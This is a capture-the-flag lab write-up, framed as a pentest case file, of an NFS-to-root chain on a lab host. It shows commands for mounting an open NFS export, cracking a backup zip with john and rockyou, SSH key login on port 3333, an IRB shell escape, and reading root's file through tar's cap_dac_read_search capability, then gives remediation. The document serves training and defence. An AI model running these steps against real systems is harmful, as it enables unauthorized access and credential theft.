Case file

NFS zip crack, nonstandard SSH, and tar capability read

Intermediate network engagement: banner and NFS hints led to a crackable backup zip with hades’ SSH key; SSH on 3333 landed in IRB then bash; tar with cap_dac_read_search archived root’s artifact.

Intermediate26 minNFS · SSH · Capabilities · Privilege Escalation
  • Port 1337 and NFS messaging pointed at a world-exported share. A weak zip held an SSH key for hades on port 3333. File capability on tar read /root without a traditional SUID shell.

  • Mounted the NFS share, cracked backup.zip, and recovered hades’ private key plus the SSH port range hint.

  • nmap found OpenSSH on 3333. Key auth as hades landed in IRB; exec restored bash.

  • tar with DAC-read capability archived /root/root.txt and extracted it as hades.

01

Engagement summary

Port 1337 and NFS messaging pointed at a world-exported share. A weak zip held an SSH key for hades on port 3333. File capability on tar read /root without a traditional SUID shell.

THE SERVER FROM HELL opened with a banner on 1337 and noisy low ports. Port 12345 hinted that NFS was on the standard port; showmount/mount of the export yielded backup.zip. zip2john and rockyou recovered the archive password; inside were flag material, a port hint (2500–4500), and hades’ id_rsa. SSH listened on 3333 (not 22) and dropped into IRB; exec '/bin/bash' restored a normal shell. getcap showed /bin/tar = cap_dac_read_search+ep — enough to archive and extract /root/root.txt without needing a root shell process.

Business impact

World-readable NFS backups with weak zip encryption are credential dumps. Nonstandard SSH ports are not secrecy. Capabilities that bypass DAC on archival tools equal data exfiltration as root. Restrict NFS exports, use strong archive encryption, and strip unnecessary capabilities from tar.

02

NFS export and zip crack

Mounted the NFS share, cracked backup.zip, and recovered hades’ private key plus the SSH port range hint.

OPERATOR · NFS

savvy@lab:~$ nc 10.10.99.10 1337

savvy@lab:~$ nc 10.10.99.10 12345

NFS shares are cool... standard port

savvy@lab:~$ sudo mount -t nfs 10.10.99.10:/ /mnt/nfs

savvy@lab:~$ zip2john /mnt/nfs/backup.zip > backup.hash

savvy@lab:~$ john backup.hash --wordlist=/usr/share/wordlists/rockyou.txt

zxcvbnm (backup.zip)

hint.txt → SSH between 2500-4500; id_rsa for hades

03

SSH on 3333 and IRB escape

nmap found OpenSSH on 3333. Key auth as hades landed in IRB; exec restored bash.

OPERATOR · SSH

savvy@lab:~$ nmap -sV -p 2500-4500 10.10.99.10

3333/tcp open ssh OpenSSH

savvy@lab:~$ chmod 600 id_rsa && ssh -i id_rsa hades@10.10.99.10 -p 3333

irb(main):001:0>

>> exec '/bin/bash'

savvy@lab:~$

04

tar cap_dac_read_search exfil

tar with DAC-read capability archived /root/root.txt and extracted it as hades.

OPERATOR · CAPABILITY

savvy@lab:~$ getcap -r / 2>/dev/null

/bin/tar = cap_dac_read_search+ep

savvy@lab:~$ tar -cvf flag.tar /root/root.txt

savvy@lab:~$ tar xf flag.tar && cat root/root.txt

root artifact recovered

Remediation

Export NFS only to trusted hosts with root_squash. Encrypt backups with unique strong passwords. Prefer key-only SSH on standard ports behind proper ACLs. Remove cap_dac_read_search from tar unless a documented, monitored need exists.